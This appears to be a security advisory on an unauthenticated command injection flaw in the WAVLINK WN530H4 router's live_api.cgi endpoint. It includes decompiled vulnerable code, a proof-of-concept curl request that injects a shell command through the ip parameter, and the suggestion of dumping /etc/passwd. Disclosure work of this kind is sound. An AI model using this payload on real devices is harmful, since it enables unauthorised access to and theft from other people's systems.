The unauthenticated endpoint in the WAVLINK WN530H4 router, /cgi-bin/live_api.cgi, contained a command line injection vulnerability that allowed unauthenticated users to execute arbitrary shell commands.

The endpoint /cgi-bin/live_api.cgi accepted three parameters in a GET request: page, id, and ip. The ip parameter contained a command line injection vulnerability. The program did not sanitize the ip parameter and used the value arbitrarily in a call to the system function.

The following decompiled pseudocode, located at address 0x400ac8 in the binary, contained the command injection vulnerability. This code executed if the page GET parameter is set to satellite_list.

...omitted for brevity...
sprintf(linux_command,"echo %s, > /tmp/satellite_list &",ip_var);
do_system(linux_command);
...omitted for brevity...

There was another endpoint that was activated when the parameter page is set to any other value. This triggers a similar command line injection, located at address 0x400d24 in the binary:

...omitted for brevity...
sprintf(linux_command,"curl -s -m 5 http://%s/mesh_get_extender.shtml",ip_var);
__stream = popen(linux_command,"r");
if (__stream != (FILE *)0x0) {
    while( true ) {
        pcVar2 = fgets(linux_command,0x80,__stream);
        if (pcVar2 == (char *)0x0) break;
        printf("%s",linux_command);
    }
    pclose(__stream);
    ...omitted for brevity...
}

Armed with this knowledge, an attacker could send a specially crafted web request like the one shown below:

$ curl /cgi-bin/live_api.cgi?page=abc&id=173&ip=;%20touch%20/tmp/hacked;

This command line injection was not blind, and the attacker could inspect the source code of the resulting page to get the command output. For instance, sensitive files could be dumped by injecting commands such as cat /etc/passwd, revealing how damaging an exploit like this could be.

[ Picture coming soon ]